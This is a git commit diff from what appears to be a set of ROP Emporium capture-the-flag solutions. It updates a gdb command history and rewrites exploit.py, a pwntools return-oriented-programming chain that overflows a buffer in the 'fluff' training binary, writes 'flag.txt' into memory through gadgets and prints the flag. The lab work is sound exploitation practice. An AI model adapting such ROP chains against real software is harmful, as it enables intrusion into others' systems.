From 406768c5fead9fcadc9dc466da4286e5ac3c7274 Mon Sep 17 00:00:00 2001
From: Brett Weiland <techcrazybsw@gmail.com>
Date: Fri, 18 Dec 2020 01:42:14 -0600
Subject: 	deleted:    x86_64/badchars/core 	modified:  
 x86_64/fluff/.gdb_history 	deleted:    x86_64/fluff/core 	modified:  
 x86_64/fluff/exploit.py 	deleted:    x86_64/ret2win/core 
 deleted:    x86_64/split/core 	deleted:    x86_64/write4/core

---
 x86_64/fluff/.gdb_history |  47 +++++++++++++++++++++++++++++++---------------
 x86_64/fluff/core         | Bin 4292608 -> 0 bytes
 x86_64/fluff/exploit.py   |  30 ++++++++++++++---------------
 3 files changed, 46 insertions(+), 31 deletions(-)
 delete mode 100644 x86_64/fluff/core

(limited to 'x86_64/fluff')

diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history
index cfa1057..0d0b7f2 100644
--- a/x86_64/fluff/.gdb_history
+++ b/x86_64/fluff/.gdb_history
@@ -1,19 +1,4 @@
 quit
-quit
-continue
-nexti
-nexti
-info reg rdi
-stepi
-nexti
-info reg rcx
-nexti
-info reg rbx
-stepi
-info reg rdx
-inro reg rbx
-info reg rbx
-quit
 stepi
 continue
 stepi
@@ -237,3 +222,35 @@ x/x 0x601be0 + 8
 x/x 0x601be0 + 9
 x/x 0x601be0 + 10
 quit
+continue
+context
+x/x 0x7fff0b74fed0
+x/100x 0x7fff0b74fed0
+quit
+break *0x400639
+continue
+context
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s 0x601be0
+quit
+continue
+continue
+quit
+break *0x00000000004006a3
+continue
+continue
+quit
+break pwnme
+run
+continue
+break *0x00000000004006a3
+continue
+info reg rip
+continue
+info reg rip
+quit
diff --git a/x86_64/fluff/core b/x86_64/fluff/core
deleted file mode 100644
index ae36a67..0000000
Binary files a/x86_64/fluff/core and /dev/null differ
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = {
 def write_str(dest, string, payload):
     payload += p64(0x00000000004006a3)
     payload += p64(dest)
-    for c in string:
-        payload += p64(0x40062a)
-        payload += p64(0x4000) # if things go wrong, check endian/order
+    payload += p64(0x0000000000400610)
+    payload += p64(1)
+    payload += p64(0x40062a)
+    payload += p64(0x4000)
+    payload += p64(letter_lookups[string[0]] - 0x3ef2)
+    payload += p64(0x400628)
+    payload += p64(0x400639)
+
+    
+    for c in string[1:]:
+        payload += p64(0x40062b)
         payload += p64(letter_lookups[c] - 0x3ef2)
-
         payload += p64(0x0000000000400610)
-        payload += p64(0)
-
+        payload += p64(1)
         payload += p64(0x400628)
-
         payload += p64(0x400639)
 
     return(payload)
         
 
-prog = gdb.debug('./fluff', gdbscript='''
-break *pwnme + 151
-'''
-)
+prog = process('./fluff')
 payload = b''
 for c in range(40):
     payload += b'a'
 
 payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
 payload += p64(0x00000000004006a3)
-payload += p64(0x601be0) # set rdi
-
+payload += p64(0x601be0) 
 payload += p64(0x0000000000400510)
 
-payload += b"\n"
 prog.sendline(payload)
-sleep(1)
-print(str(prog.recv(), 'UTF-8'))
 prog.interactive()
-- 
cgit v1.2.3